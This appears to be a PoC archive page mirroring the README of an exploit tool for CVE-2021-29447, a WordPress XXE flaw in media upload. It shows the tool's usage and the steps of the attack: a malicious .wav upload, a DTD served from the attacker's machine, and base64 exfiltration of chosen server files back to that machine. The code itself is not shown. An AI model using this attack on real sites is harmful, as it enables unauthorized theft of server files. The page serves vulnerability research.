Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-29447 PoC — WordPress 代码问题漏洞

Source
https://github.com/b-abderrahmane/CVE-2021-29447-POC
Associated Vulnerability
Title:WordPress 代码问题漏洞 (CVE-2021-29447)
Description:WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 存在代码问题漏洞,攻击者可利用该漏洞在成功的XXE攻击中可以访问内部文件。
Readme
# CVE-2021-29447-POC

## About

This script automates the required steps to exploit [CVE-2021-29447](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447) in the media upload funnctionality in Wordpress and use it to extract files vi an XXE.

## Usage

```
 ./generate_payloads.py --help
usage: generate_payloads.py [-h] [--local-ip LOCAL_IP] [--local-port LOCAL_PORT] [--media-payload MEDIA_PAYLOAD] [--dtd-payload DTD_PAYLOAD]
                            [--files-to-fetch FILES_TO_FETCH [FILES_TO_FETCH ...]]

CVE-2021-29447 payload generator

options:
  -h, --help            show this help message and exit
  --local-ip LOCAL_IP   Local machine IP address
  --local-port LOCAL_PORT
                        Local machine port which will run an HTTP server to receive the exfiltrated files
  --media-payload MEDIA_PAYLOAD
                        Name of the .wav file containing the exploit to be generated
  --dtd-payload DTD_PAYLOAD
                        Name of the .dtd file containing the exploit to be generated
  --files-to-fetch FILES_TO_FETCH [FILES_TO_FETCH ...]
```

The script does the following:

- First step: It generates a .wav payload you need to upload to the target server. You can use `--media-payload` to pass its name.
- Second step: It generates a DTD document which will be server via an http server locally. You can use `--dtd-payload` to pass its name. This file will contain the absolute paths of the files you would like to extract from the target machine, you can specific a list of comma separated files via `--files-to-fetch`
- Third step: It runs a simple Python HTTP server to which the `.wav` payload will connect back to both to fetch the second part of the payload (the DTD document) and to send the fetched files from the remote system.
- Fourth step: If all of the files you specified exist on the remote filesystem, these files will be sent back to the HTTP server in a B64 encoded format, the script will then decode them and save them to your current working directory.

## Disclaimer

This software has been created purely for the purposes of research and for the development of effective mitigation techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
File Snapshot

 [4.0K]  /data/pocs/cc7ca7730fe0ad648adc56849b2b8ef83679f0ec
├── [ 699]  colored_formatter.py
├── [5.9K]  generate_payloads.py
└── [2.3K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.